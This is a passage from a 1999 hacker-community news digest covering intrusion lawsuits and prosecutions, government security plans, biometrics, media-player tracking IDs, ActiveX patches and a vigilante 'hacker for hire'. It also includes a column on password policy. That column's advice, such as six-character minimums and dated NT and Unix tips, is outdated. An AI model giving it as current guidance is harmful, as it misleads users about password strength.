toward making people more comfortable doing business over the Internet. "Over the next two years you're going to see an increased focus on security as more people do business over the Web," says Joseph Ferlazzo, vice president of syndicated services for Technology Business Research. "It's essential to have a verifiable digital signature that will allow companies to engage in business transactions," he adds. "What IBM is trying to do is make this an essential part of computer configurations going forward so that the capability will already be inside the computer." @HWA 07.0 Law Firm Sued Over Possible Cyber Attack ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Weld Pond Moore Publishing of Pennsylvania is seeking more than $800,000 in damages from the Washington based legal firm of Steptoe & Johnson. The suit alleges that an employee of Steptoe & Johnson attempted to break in to the computer systems of Moore Publishing. Steptoe has vehemently denied the charges but Moore claims that they have logs that will prove their case. Washington Post http://search.washingtonpost.com/wp-srv/WPlate/1999-09/20/018l-092099-idx.html Monday Morning Monday, September 20, 1999; Page F03 DID YOU HEAR? . . . "It was probably the biggest disappointment I had in years of economic development [work] because it seemed so winnable." -- Richard Monteilh, former D.C. economic development official, on losing MCI WorldCom Inc. operations to Loudoun County. Tracking a Hacking Plenty of lawyers have been called hacks, but lawyers at Steptoe & Johnson are among the first to be called hackers. Seeking more than $800,000 in damages, Moore Publishing of Pennsylvania sued the blue-chip Washington firm for allegedly trying to sneak into one of the company's Internet domains. The lawsuit, filed last week, alleges that someone at Steptoe -- they're not sure who -- tried to hack into the site eight times in August. "The attempt did not display the mark of genius," said Rodney Sweetland, the Arlington solo practitioner suing on Moore's behalf. "Whoever did this knew something about hacking, but not enough to cover their tracks." Steptoe officials say the suit is completely baseless and that they'll fight it vigorously. The firm has already rebuffed an overture to settle the matter out of court. Sweetland claims that computer logs will prove his case, but he offered only a sketchy explanation of Steptoe's possible motives. Moore's primary business is digging up electronic data for companies conducting asset searches, but it has a sideline as a cyber-squatter. It has purchased the rights to the Internet domain names of a handful of law firms, apparently hoping to resell those rights at a later date. Among the names it owns: Steptoejohnson.com. Still, it's unclear why any Steptoe employee would care. The firm already has a Web site at steptoe.com. -- David Segal @HWA 08.0 Danish Man Sentenced for Intrusion Attempt ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by root A man, whose name has not been released, has received a two year suspended sentence for attempting to break into the personal computer of the head of the Copenhagen police's special computer crime unit. The illegal activities took place in January of this year. The judge in the case did not follow the prosecution's suggestions to confiscate the accused computer equipment. Phoz.dk http://www.phoz.dk/news/en/bo_trial.html HNN Archive for January 25, 1999 http://www.hackernews.com/arch.html?012599 Phoz.dk - news 20-year old hacked police officers computer This is the newest article, covering the actual sentence "It may sound silly but I did it to help others people". With a low voice, clearly nervous a 20-year old man explained Wednesday in Copenhagen Courtroom, how he in January 1999 hacked two different private computers. He did this using a tool that via the Internet searches for machines infected with a certain trojan. The attacker was earlier victim of the same tool so it came natural to warn others against it. "I now realise that this is illegal. I wasn't certain back then", said the young hacker who didn't destroy anything during his hacking attempts. He got a suspended sentence with no limitations and a trial time for two years. The judge didn't follow the prosecutor's suggestions that the hacker's computer equipment should be confiscated by the police. "You have probably got enough warnings," judge Henrik Bitsch said. The 20-year old hacker was uncovered when he tried hacking a computer based in the home of a police officer. A anti-virus tool identified the intruder and lead the police to his house. ... Danish Hacker Picks Wrong Victim The first article, don't remember who the author was. COPENHAGEN, Denmark (Jan. 22, 1999) - A 19-year-old Danish student picked the wrong victim when he hacked his way into a home computer. He was arrested Thursday by the machine's owner - the head of the Copenhagen police's special computercrime unit. Detective Arne Gammelgaard had installed an anti-virus program in his computer at home. On Sunday, it warned him about an intruder and enabled him to gather information about the visitor. Gammelgaard investigated and an Internet provider helped track the hacker. The student, whose name was not released, confessed to hacking and said he randomly picked the cyber-cop. The hacker was released after he was charged with ``unauthorized access to another person's documents or programs.'' The maximum penalty is six month's imprisonment. @HWA 09.0 DOE to Spend $80mil on Info Security ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Sarge The Department of Energy will spend $80 million over the next two years to create a security net for its systems. A four point plan covering policy, personnel, operational and technical requirements has been approved by DOE senior management. This new plan comes soon after the Los Alamos espionage scandal. ($80 million? Damn thats a lot of dough.) Government Computer News http://www.gcn.com/vol18_no32/news/700-1.html September 27, 1999 DOE sets security course Department will allot $80 million to bolstering data controls By Frank Tiboni GCN Staff The Energy Department will spend $80 million over the next two years to create a security net for its systems, chief information officer John Gilligan said of the cybersecurity plan he will roll out departmentwide next month. The four-point plan calls for sweeping changes in how the department protects its data re-sources, Gilligan said. He said the plan’s four areas address policy, personnel, operational and technical requirements. He submitted the plan to Energy senior management late last month and got the green light to begin work immediately. To make sure that new security initiatives take hold beyond department headquarters, Gilligan has asked field sites to designate CIOs or equivalent officials as lead security officers. The obvious first step is awareness, Gilligan said, so a major component of the plan is training and education. The department will begin a two-year, $2 million multimedia program right away, he said. Secretary Bill Richardson initiated several security re-forms in the wake of the Los Alamos espionage scandal, including giving computer security oversight to Gilligan [GCN, May 24, Page 1]. A central component of Richardson’s reform package directs Gilligan to improve the security of information that is stored, processed or transmitted by Energy systems. The reforms also realigned the CIO’s office under the new Office of Security and Emergency Operations, which is headed by former Air Force Gen. Eugene E. Habiger [GCN, June 28, Page 1]. The 47-page systems security plan—which Gilligan’s staff had been working on since mid-May with help from Booz, Allen & Hamilton Inc. of McLean, Va., Electronic Data Systems Corp. and Mitre Corp. of Bedford, Mass.—details ongoing and planned activities. Gilligan said the department will use it as a cybersecurity road map for the next five years. “It’s a sound plan that’s comprehensive, addresses needs and is doable,” he said. “It will clearly allow us to achieve a significant improvement in computer security in the next two years.” Gilligan said he will coordinate the execution of the plan through the department’s Field Management Council. During Phase 1, which takes place from October through December, more than 1,000 systems administrators and managers at the department’s national laboratories will undergo training in network security, system-specific configuration planning, Web server security, mail server security and cybersecurity policies for managers. Following up on that initial training, Energy will broaden its program to ensure that appropriate training is given to all DOE personnel and contractors within the next two years. The training will cover the security requirements for all systems—those that handle classified information as well as those that handle unclassified data. Gilligan said another effort will be to improve security operations in the department. Energy will spend $45 million of the $80 million it is setting aside for systems security through fiscal 2001 on bolstering program management, monitoring ability and protection know-how. As part of this effort, Energy will expand the staff of its Computer Incident Advisory Capability at the Lawrence Livermore National Laboratory in Livermore, Calif., from seven to 25 people over the next year. CIAC will be Energy’s first line of defense. It will spearhead intrusion assessment, warning and response, and the day-to-day monitoring of department systems and networks, Gilligan said. @HWA 10.0 The Army Wants to Eliminate Passwords ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com contributed by Sarge The US Army wants to reduce or eliminate password use by using biometric alternatives for access to computer and weapons systems. The Army wants unique identifiers that cannot be stolen or forgotten and is looking to biometrics as the answer. The Army is currently conducting a study that will consider the legal and sociological implications as well as logistical issues surrounding large-scale biometric recognition. Government Computer News http://www.gcn.com/vol18_no32/news/702-1.html September 27, 1999 The service wants to eliminate passwords for verifying users By Patricia Daukantas GCN Staff The Army will investigate biometric recognition devices as a way to reduce or eliminate password use for accessing computer and weapons systems. Commercial biometrics can be leveraged for military systems, said Phillip Loranger, a division chief at the Army Information System Security Office in the Directorate of Information Systems for Command, Control, Communications and Computers. The Army wants soldiers to have unique identifiers that cannot be stolen or forgotten. “We need to dump the way we do passwords,” Loranger said this month at a meeting of the Biometric Consortium in Arlington, Va. The service approved the study early this month and is kicking it off with fiscal 1999 year-end funds. Loranger declined to put a price on the effort, which he will lead. He said the study, slated for completion by spring, will consider the legal and sociological implications and the feasibility of large-scale biometric recognition for Army systems. Iris recognition, in which an imaging system scans the pattern of an eye’s iris, will be the first technology studied. It has an edge over fingerprint and voice recognition, Loranger said, because it works even when someone is wearing protective headgear. “Voice doesn’t work through a gas mask,” Loranger said. “Fingerprints can’t be taken through rubber gloves.” He said recent innovations allow iris recognition through plastic face shields and eyeglasses. The system uses a small imaging device, not unlike a digital camera, that plugs into a PC and compares a user’s iris image against stored patterns of known users. The study will also examine fingerprint and voice recognition. Loranger said the Army already collects soldiers’ fingerprints. The recognition tools for desktop PCs cost $100 to $2,000, he said, and can be built into keyboards, mice and notebook computers. Voice recognition systems can work either at desktop systems or over dial-up lines, re-quiring only a microphone and a sound card. The study will examine setting up an Army or Defense Department center for biometric technology. “You couldn’t find a better test bed anywhere” than the Army, Loranger said, because its computers run at least 17 operating systems, including legacy OSes. Too hard He acknowledged that some systems still will require passwords, at least with today’s technology. But asking soldiers to remember multiple eight-digit, randomly generated pass codes is “hard security,” Loranger said. “The easier you make reliable security, the better that security will be.” He said he is more interested in integrating off-the-shelf technology into military systems than in conducting an extensive development effort from scratch. Loranger said he envisions a time when biometric recognition will even be integrated into the handgrips of guns to prevent unauthorized use. “All it takes is time and money,” he said. @HWA 11.0 MediaPlayer and RealPlayer send GUID's to internet sites ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by FProphet http://www.junkbusters.com/ht/en/new.html http://www.seattleweekly.com/features/9914/tech-fefer.shtml Media Player and privacy BY MARK D. FEFER ONE PLACE WHERE RealNetworks and Microsoft are unlikely to compete is on the issue of privacy. There has been a flurry of controversy lately over uniquely identifying numbers embedded in Intel's new Pentium III chip and Microsoft's Windows 98 operating system. To quell the outrage, Intel has introduced software that will allow computer users to hide the chip's unique serial number, so that it can't be used to track users' Web behavior. And Microsoft has pledged that it will no longer collect a number known as the Globally Unique Identifier, or GUID, when registering Windows 98 users. All the while, however, people who use streaming media have already been tagged with such a unique, identifying number. Seattle Weekly has learned that both the RealNetworks' RealPlayer and the Windows Media Player carry GUIDs, and those numbers are transmitted to any site where you access a streaming file. This opens up at least the possibility of a database in which all your streaming media use can be recorded (though there is no indication that such a database exists). Gary Schare, Microsoft's lead product manager for Windows Media Technologies, confirms that each Media Player carries a GUID. But he says the company keeps no database with those numbers and does not track individual Media Player usage. RealNetworks officials did not respond to numerous requests from Seattle Weekly to discuss the subject of GUIDs. But executives in the business of tracking Web usage say that the RealPlayer, too, carries an identifying code. And RealNetworks, unlike Microsoft, requires you to submit your name and e-mail address before allowing you to download the player. Every time you click onto a Web page, a variety of information about you is automatically recorded in the site's "log files"--information such as what kind of browser you use, what page you were last visiting, how long you stayed at the site, etc. If you use a media player at the site, your media-streaming activities are also recorded, along with your player's ID number. Bill Piwonka, a product manager at Portland-based WebTrends, which makes the leading software program for sorting and analyzing log files, says that although media player GUIDs appear in the files, WebTrends does not actually compile those ID numbers or present them in its reports. "WebTrends doesn't do anything with the number," he says. "We're not really sure what it's there for or how it's used." On the other hand, Piwonka notes, "There's no way for us to know if Microsoft or Real have put something in there that helps them track." Computer programmer Richard M. Smith, the head of Phar Lap Software, who first drew attention to the Windows 98 GUID last month, says the only way to find out would be to "put a 'packet sniffer' on, and see what's going down the wire" when you call up a media stream. But Gary Schare of Microsoft insists that "the only place [the GUID] appears is in the log files. We don't ever pass that information around, or back to Microsoft in any way." Schare says the only contact between the player and Microsoft is through "our upgrade mechanism," whereby a player will "ping" the Microsoft server, and you'll be automatically "reminded" to upgrade if you don't have the current Player version. But even that mechanism, while in place, has not been activated, Schare says. So why is the GUID even there? At press time, Schare said he did not know the technical justification. "I know there's a good reason. We don't just stick stuff like that in randomly." Jason Catlett, who runs the privacy watchdog Junkbusters, speculates that the GUID could be useful for apprehending copyright violators. Just as the Windows 98 GUID is imprinted in documents created with Microsoft Office, the GUID from your player could be imprinted into the media file, Catlett speculates, and that could help track down the source of any unauthorized copying. But Schare contends that streaming files are untouched. "It's read only. There's no tracking in a piece of content as to who's played this. That doesn't occur." @HWA 12.0 GTE accidentally sends unlisted numbers to telemarketers ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by FProphet http://www.junkbusters.com/ht/en/new.html California's second-largest telephone company included about 50,000 unlisted numbers and addresses in the lists that they routinely sell to telemarketers, AP reported.(1998/4/17) @HWA 13.0 ``Relationship Marketing?'' We have to talk... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Contributed by FProphet http://www.junkbusters.com/ht/en/new.html Susan Fournier, author of Preventing the Premature Death of Relationship Marketing has found that ``consumers are growing irritated and overwhelmed by the personal information being gathered about them in the name of direct marketing. One woman recently canceled her supermarket loyalty card after she received a personalized letter reminding her that it was time she bought more tampons.'' -- The Economist (1998/3/14, p. 68) @HWA 14.0 News and views from SLa5H ~~~~~~~~~~~~~~~~~~~~~~~~~ * N E W S B Y S L a 5 H * ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ If You would like to contribute something contact me (smuddo@yahoo.com) or Cruciphux at cruciphux@dok.org .Allso check out my site at: http://members.xoom.com/_XOOM/dao32/ Content ~~~~~~~ 1.HOT NEWS - Hacker Pleads Guilty To Grade-Fixing' - Are Eastern Europe's Banks Being Cracked? - Implementing Security Measures - Activists Pull Stunt To Show Crypto Holes - U.S., Network Solutions Reach Agreement - CMGI to acquire free ISP 1stUp - Microsoft - ActiveX Holes - Privacy Groups Wary Of Encryption Reforms - Wild Wild Web - Desperate countdown to ready Cold War remnants for Y2K - Computer wizards crack code in worldwide challenge - U.S. finds malicious code changes in Y2K "fixes" - financial firms create Net crime watch - SEC investigates NetRoadshow security breach - Court to revisit encryption ruling - Microsoft Patches IE Security.....Again - Justice Dept. Funds Antihacking Campaign - Quantum confidential - Online Credit Card Security Fears Waning, But Still a Factor - India: Code-Smuggling? Absurd 2.SPECIAL - Hacking in 1999 | Courent state of hacking 3.VULNERABILITYS - Linux Kernel 2.2.x ISN Vulnerability 4.READING MATERIAL - Mastering Network Security - Cisco IOS Network Security - Cryptography and Network Security : Principles and Practice - Internet Security : Professional Reference 1. H O T N E W S ~~~~~~~~~~~~~~ Hacker Pleads Guilty To Grade-Fixing' ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ An 18-year-old computer hacker who boosted grades for fellow high school students in exchange for money has pleaded guilty to one count of felony computer trespass. Sentencing for Adam R. Jerome was scheduled for Oct. 7 in Clark County Superior Court. Jerome's accomplice in the crime, Phillip J. Latimer, also 18, pleaded guilty Friday to a lesser charge of misdemeanor computer trespass. "Mr. Latimer was essentially the marketing person for Mr. Jerome's services," deputy prosecutor Beau Harlan told Judge Barbara Johnson. Latimer collected between $2 and $80 from 22 Evergreen High School students, most of them seniors, who wanted their transcripts altered. He was handed a 30-day sentence -- two days in Clark County Jail and 28 days on work crew -- and will be on probation for one year. Harlan said he'll recommend a 90-day sentence for Jerome, who was on juvenile probation for burglary when he hacked into the school district's computer system. Jerome altered 31 transcripts in all, Harlen said. Word of the grade-boosting surfaced in April. Jerome and Latimer were charged in June. School officials estimate it will cost more than $15,000 to upgrade the security on the computer system, Harlan said. Latimer and Jerome will be ordered to pay restitution. Jerome's lawyer, Jon McMullen, said his client had no idea hacking into the school's computer system was a felony. "He knew what he was doing was wrong, but it's a question of how wrong," McMullen said. "He thought he might be expelled, but not labeled a felon for the rest of his life." Latimer, who has no prior criminal record, said the hacking started as a prank. "To this day I can't really say why I did it," Latimer said. "I just honestly know it was a mistake." Prosecutors decided not to charge the students who paid to have their grades changed. They were suspended from school for 10 days. Are Eastern Europe's Banks Being Cracked? ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ A few weeks ago, marketing companies in the Czech Republic received an anonymous e-mail from a self-proclaimed computer security expert. The e-mail's author boasted of having just penetrated the system of the largest bank in the country. The network cracker was offering to sell to the marketing firms information about Ceska Sporitelna's 2.5 million customers including where they worked, how much they made and their account numbers. As Czech reporters struggled to unravel the case, they were hindered by contradictory revelations from the police department and the bank. Early reports, attributed to an unnamed police source, carried full details of the alleged hack, saying that the bank's systems had indeed been penetrated, and that detectives had verified the authenticity of the data. But by the middle of last week, the police department was no longer answering questions, saying an information embargo had gone into effect on Sept. 15. The day before, the bank's general director had issued a statement saying that the hacks had never happened, and were merely an effort to discredit the state-run bank, which is gearing up for privatization. Then the bank, too, stopped commenting. The International Chamber of Commerce, a body of companies and trade associations from 130 countries, says its anxiety about such cases is growing. As financial institutions around the world continue to bring services online, security measures become more imperative and more vulnerable than ever. According to Blue Sky Research in Paris, European Internet sites in particular are growing by large percentages. Blue Sky reported in July that the number of banking sites in Europe had grown from 863 in November 1998 to 1,845 by the following summer. Pottengal Mukundan, the director of the ICCs Commercial Crime Services division, says the biggest complication is that banks don't want the world to know when a breach has occurred. "For the last couple of years we have been looking at this problem," Mukundan says. "We can't speak of examples, because this is a sensitive subject. Banks in particular don't wish these cases to be made public." In response, Mukundan says the ICC is readying a special unit to tackle cybercrime. The unit will make its public debut in London at the end of the year, at the Alliance Against Cybercrime conference. The new department, he says, will allow companies to keep their worries private. The unit hopes to solve cybercrimes without exposing banks to dangerous publicity. "Basically, we act as a club for our members so they can talk to us in confidence," Mukundan says. "Normally, in matters such as fraud, banks and insurance companies are very hesitant to talk to other banks. The idea in forming the [cybercrime] bureau is that they will feel a little more secure in telling us what their experiences are. We will then hold on to the information and pass it on to other [companies] without revealing the source." A similar approach, he adds, has worked in other industries like international shipping. The ICC's closed-door plan holds particular appeal for banks in Eastern Europe and developing nations, according to Evan Neufeld, VP of international research at Forrester Research (FORR) in London. Competition, market regulation and law-enforcement agencies in prevent banks in the U.S., Western Europe and developed Asia from hiding security breaches. Implementing Security Measures ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ So far we have talked about your risks, known exploits and bugs, and your policies or lack of them, but now we we start to get into the meat of Internet and network security. It is now time to start implementing security measures on your system. We are going to start with passwords. We begin here because (a) It is a pet peeve of mine that system and network passwords are so often badly managed, (b) This is the first and most important link in your security chain, and (c) it is a very easy place to start. This part of basic password policy I have gone over before but it is so basic and so important that I feel that repeating it is worth it. Make your passwords secure by following certain rules. Here are some do's and don'ts: Don't Use the following for passwords: Your first name. Your last name. Your login name. Your pet's name. Any name at all. SS number. House number. Telephone number. Your bank PIN. Any password shorter than six characters. Do Use passwords of six characters or more. Use a combination of letters and numbers. Use a combination of letters, numbers, and special characters. What makes a password secure is the amount of complexity you have in creating the password. This complexity is not just to prevent someone from guessing what the password is, but also to thwart the efforts of crackers who use special cracking software to crack a password. Password cracking programs work by using a dictionary of words to compare the passwords to. This means that any word at all can easily be discovered. Any word that can be found in a dictionary, no matter how obscure it may seem, can easily be revealed. Most password cracking program , after using the dictionary approach will then start using combinations of letters. A password that has a what seems like a random sequence of pure letters is also easily cracked. I was able to crack the password "kgjhuy" in under two minutes. The next attack a password cracking program will use is a combination of letters and numbers. I was able to crack the password "jim1952" in under 10 minutes. Similarly the password "j1i9m52" took a couple of hours to crack. The password "jim&1*9!52#" has not been cracked yet after more than 12 hours. So the most secure password is one that is more than six characters long and is a combination of letters, numbers, and special characters that are intermixed within the password. So now that you have set your password policy, it is time to enforce it. Just by telling everyone that their passwords must be six characters or more and contain a mix of letters, numbers, and special characters, does not mean that they will do this. While doing a password audit once, I found that some people had no password, some used their login name as their password while others used the same letter or number six times. So how do you enforce password policy? Windows NT gives you rudimentary tools for enforcing password policy. If you open the User Manager For Domains (as administrator, of course) and go to the menu "Policies" and choose "account". You are presented with a properties page for passwords. Here you can set the password length, days until expiration, lockout retries and password history. Let me go over what each of these is for. Minimum Password Length is somewhat self explanatory. You can set the value for the minimum length a password must be here. If you set it to 6, then each user in that domain must choose a password that is at least six characters long. Days until expiration or Maximum password age allows you to set the length of time that will pass before a user has to change their password. In high security areas the maximum password age is set for 7 days or even as low as 1 day. For most people somewhere between 30-90 days will suffice. Account lockout is so you can set the maximum number of retries a person has until that account is locked out. This prevents someone from trying to repeatedly guess a users password. Don't set this number too low. Many administrators set this at 3 but I feel that this is too low. If you mess up on the first try, you only have two more tries before your account is locked. I would set this number to 5 or 6. This gives the user some fudge room while at the same time prevents password guessing by unauthorized individuals. Password history or Uniqueness prevents the user from choosing the same password over and over. Unless you assign passwords to your users, do not set this value too high. If the user must always choose a completely new password every 30 days, they will run out of password ideas. This of course, will make your job harder because the users will forget what the password was that they created thus making you have to unlock their account several times a week. Unfortunately, there is no way to specify that the user must have a mix of letters, numbers, and special characters from within Windows NT. For that kind of control you must use a third party software product to do this. Products like "Password Appraiser" and "Password Policy Enforcer" let you set and enforce a strong password policy across the enterprise. With Unix or Linux operating systems, the default password policy is very lax. In fact, you can set up a root account with no password at all if you wish. Of course this is different with different versions of Unix, some versions are more lax than others. You can set password policies rather easily in *nix with some simple scripts. If you are reasonably proficient in Perl, you can write a simple script that will specify password length, types of characters and password expiration without having to go out and buy a third party solution. If Perl is not your thing, I have provided a link below that has some sample scripts that you can use. Another point to note is that many Unix password files are not very securely encrypted. It would not take much effort to crack the passwords in passwd file. For this reason you might want to consider other measures to ensure strong password encryption. For Linux you can use the Password Shadow Suite. The Linux Shadow Password Suite gives you strong encryption of your passwd file that resists brute force cracking techniques. Passwords are the first link in your security chain. If this link is weak, then your whole chain is broken and no combination of firewalls, proxies or other measures will keep your network secure. Focus on your passwords first and then you can add other security tools as you need them. Activists Pull Stunt To Show Crypto Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The British Home Secretary has been sent a potentially incriminating e-mail by a pressure group trying to show that a draft e-commerce law could see innocent people falsely imprisoned. Stand -- a group campaigning against controversial measures in the Electronic Communications Bill to govern the supply and use of encryption -- said on Monday it had sent Jack Straw an e-mail containing a confession to a crime. This had been encrypted with a key created in Straw's name and registered on international public key servers, "The police may come and demand that you supply the key requiredto make this message intelligible," the letter said. "If you fail to do so, you would be committing an offense under the [Electronic Communications] Bill rendering you liable to imprisonment for up to two years. "The fact that you don't possess this key won't help you unless you can prove that you don't have it. I wish you well in proving that it isn't hidden away on a disk in your secretary's home, or squirreled away on the Internet somewhere." The group, supporting the view of lawyers who have spoken on the subject, argued the draft legislation would reverse the "innocent until proven guilty" principle. Last week, Nicholas Bohm of the Law Society told a conference the bill would reverse the burden of proof and breach the European Convention on Human Rights that protects against self-incrimination. At the same Scrambling For Safety 3.5 conference, the new e-commerce minister Patricia Hewitt defended the Bill saying its requirements were no different than the police being able to develop a roll of film found in a defendant's home when searched. But Bohm argued the bill's powers were closer to the analogy of forcing the accused to develop a film themselves if it required special processing and the police could not develop it. In current law, suspects do not commit a crime if they decline to do this. He also used the analogy of a booby-trapped safe, where the contents could be destroyed if it was opened. The police could not currently force a suspect to deactivate any such privacy measures. "Even if you can prove that you don't have it, you would still be liable for imprisonment unless you give information to the police that enables them to decrypt the key," the letter said. "Unfortunately for you, this is impossible, because we've destroyed all copies." A Home Office spokeswoman said the department didn't believe the bill would reverse the burden of proof as the prosecution would still have to prove guilt beyond a reasonable doubt in all cases. She conceded that confusion may have arisen from putting specific defenses on the face of the Bill. Such as: "If you don't have the key, but you give as much information as possible about how it could be obtained," she said. Of the letter, the spokeswoman said people could be falsely incriminated in this way today without the Bill and without encryption being involved. "We think that's almost a red herring," U.S., Network Solutions Reach Agreement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Internet address registrar Network Solutions and the U.S. Commerce Department have finally reached an agreement to offer competitors long-term access to the company's domain name database, a source familiar with the deal said Monday. Following almost a year of negotiations, Herndon, Va.-based Network Solutions has agreed to let competing companies register new Internet addresses for a fee of $6 per year, well below the $35 per year Network Solutions charges its customers. The company will continue to manage the database of already registered names for at least four more years, under the agreement. In essence, other companies will be able to compete for the "retail" business of registering new domain names, while Network Solutions will continue to run the "wholesale" business of keeping track of already registered names and informing Internet servers how to route traffic. During an ongoing, several month "test" of competition, a handful of companies were allowed to register Internet address names into the Network Solutions database for a fee of $9 pername, per year. Network Solutions has also agreed to be overseen, as its new competitors are, by the Internet Corporation for Assigned Names and Numbers (ICANN), a California nonprofit tapped last year by the Commerce Department to administer the domain name system. The agreement is to be announced at a Commerce Department press conference on Tuesday. Under an agreement with the government that expired last year, Network Solutions was the only company permitted to register Internet domain names, the addresses of websites, e-mail, and other Net resources, that ended with the popular .com, .net and .org suffixes. But the Clinton administration decided to privatize the system, handing the reins over to ICANN last November and earlier this year, letting firms compete with Network Solutions for the first time. Since then, ICANN has struggled to get off the ground, running into criticism from Internet users and members of Congress for making decisions behind closed doors and proposing to fund itself with a fee of $1 per domain name. And Network Solutions battled the Commerce Department and Congress as it asserted ownership of the list of more than 5 million domain names it registered before the onset of competition. On Monday, a spokesman for Network Solutions declined to comment. A spokesman for the Commerce Department said Secretary William Daley would make a statement on the domain name situation at Tuesday's press conference. Network Solutions stock rose 5 7/8 to 72 13/16 in trading of over 1.2 million shares on the Nasdaq on Monday. CMGI to acquire free ISP 1stUp ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Internet holding company CMGI said today that it has agreed to buy free Internet service wholesaler 1stUp.com, in a move that solidifies the company's moves toward creating a full-service Web access and content powerhouse. San Francisco-based 1stUp is the same company that provides CMGI affiliate AltaVista with its free ad-subsidized Internet access service, launched in August. The start-up also has signed a deal to provide its free service to Bolt.com, a teen-oriented Web portal. The deal comes as CMGI has been moving to more closely integrate its various Web properties in hopes of taking on established Web players like Yahoo and America Online Microsoft - ActiveX Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~ Microsoft has patched a handful of security holes in its Internet Explorer browser and ActiveX technology that made computers vulnerable to attack by malicious Web site operators. The first patch takes care of a problem with IE's ImportExportFavorites feature, which lets users tranfer lists of frequently visited Web addresses. The bug lets a malicious Web site operator run executable code on the computer of someone who visits that Web site. "The net result is that a malicious Web site operator potentially could take any action on the computer that the user would be capable of taking," Microsoft warned in a security alert earlier this month. Microsoft's patch eliminates the problem, the company said today. Versions 4.01 and 5.0 of IE are at risk. The patch also fixes a related problem involving ActiveX, Microsoft's technology for bringing interactive scripts and controls to Web pages. ActiveX has long been a security headache for Microsoft. Critics of the technology fault its "trust-based" security model, in which signatures let users choose whether to download an ActiveX control. With this system, users are expected to judge that controls signed by well-known companies like Microsoft are less likely to be maliciously designed than those signed by unknown entities. In the latest discovery, Microsoft identified eight ActiveX controls it said were "incorrectly marked as 'safe for scripting,'" a designation that assures users that they can download the controls without posing any security risk to their own computers. The controls could be manipulated for malicious ends, however, Microsoft said. The controls in question are Kodak Image Edit: Wang Imaging; Kodak Image Annotation: Wang Imaging; Kodak Image Scan: Wang Imaging; Kodak Thumbnail Image: Wang Imaging; Wang Image Admin: Wang Imaging; HHOpen: HTML help files; Registration Wizard: Internet Explorer Product Registration; and IE Active Setup: Internet Explorer Setup. Microsoft credited Bulgarian bug hunter Georgi Guninski with discovering the so-called ImportExportFavorites bug. Richard Smith of Pharlap Software and Australian bug hunter Shane Hird were recognized for discovering the ActiveX problems. Privacy Groups Wary Of Encryption Reforms ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Privacy groups and some lawmakers said Tuesday that they are concerned about legislation the Clinton administration has proposed that gives law enforcement potentially wider berth to access secure data to balance the relaxation of encryption-export controls. Representatives from the Justice, Defense, and Commerce Departments and the White House briefed reporters and the Congressional Internet Caucus Advisory Committee, a bipartisan group of lawmakers, on the need to let law enforcement access encrypted material in criminal investigations. The White House on Sept. 16 relaxed controls on data-scrambling products that are mass marketed to any country except those seven considered to support terrorism after a one-time technical review. The exact wording of the new regulation will be published by Dec. 15. Industry praised the reforms because the about-face in the administration policy would let U.S. companies compete globally in strong encryption products. However, the reform package also includes draft legislation, the Cyberspace Electronic Security Act, that outlines when and how law enforcement may access secure data. "We have deep concerns with the draft we've seen," said Jerry Berman, executive director of Center for Democracy and Technology, a privacy group here. The standards for court-ordered access to decryption keys and non-disclosure agreements protecting proprietary data gleaned in the course of investigations are ambiguous, he said. "The legislation should be written very clearly what sources and methods law enforcement and national security will use," Berman said. The White House has sent the cyberspace security legislation to Capitol Hill and it can be introduced any time, he said. This legislation deserves many hearings and will originate in the Senate Judiciary Committee, Berman said. The encryption reforms will move forward by Dec. 15 whether the controversial legislation has been passed or not, said Commerce Under Secretary William Reinsch, head of the Bureau of Export Administration. Before the administration's lifting of encryption controls, legislation in the House of Representatives, the Security and Freedom Through Encryption, or SAFE Act, which would eliminate controls, was close to passage. "The administration's announcement doesn't let Congress off the hook. We still need legislation that provides permanent, significant guidelines for the FBI to get a key," said Sen. Patrick Leahy (D-Vt.), co-chair of the Internet caucus. The author of the SAFE Act, Rep. Bob Goodlatte (R-Va.), said the bill, which enjoys broad congressional support, was ready for a full House vote. "Whether it goes depends on the details of the administration's rule," Goodlatte said. The cyberspace security legislation will protect personal and industry privacy while also recognizing the serious problem of criminals hiding evidence, said Jim Robinson, Justice's assistant attorney general for the criminal division. The legislation gives special protections to those who deposit their decryption key with a third party, he said. "We will not let the public be left on the cutting floor," Robinson said. Peter Swire, the White House chief counsel for privacy called the cyberspace bill a tailored response to law enforcement. "We will get the rule down right," Swire said. Wild Wild Web ~~~~~~~~~~~~~ Cybercrime units are overworked and understaffed, so many Netizens are taking matters into their own hands. You're a bank, and you think someone is trying to hack into your computer system. Where do you turn? Law enforcement offers little help - agencies are overworked and understaffed, and you risk public embarrassment if word gets out. Apparently, there's another option. You might decide to take the law into your own hands. Which means you might call a man known as Lou Cipher. "Lou" says he's spent the last 10 years working for Fortune 500 companies, turning the tables on computer intruders, performing what some have called vigilante justice in cyberspace. Cipher, a pseudonym, of his own choosing, says he retired from a 15-year career as a computer consultant in 1990. By then, he had already started his life as a hacker for hire. In the past 10 years, he's says he's been hired over 50 times by big U.S. firms - mostly financial institutions - looking to get hackers off their back. He says fees now start at $100,000 for new clients, "with no promises of success." He and his "associates" often take on their tasks by "bridging from the virtual world to the physical." That means breaking into the same computers a hacker has hijacked, chasing the trail through cyberspace, obtaining a real-world address and paying a real-life visit. Cipher says he's even broken into homes and stolen hackers' computers to teach them a 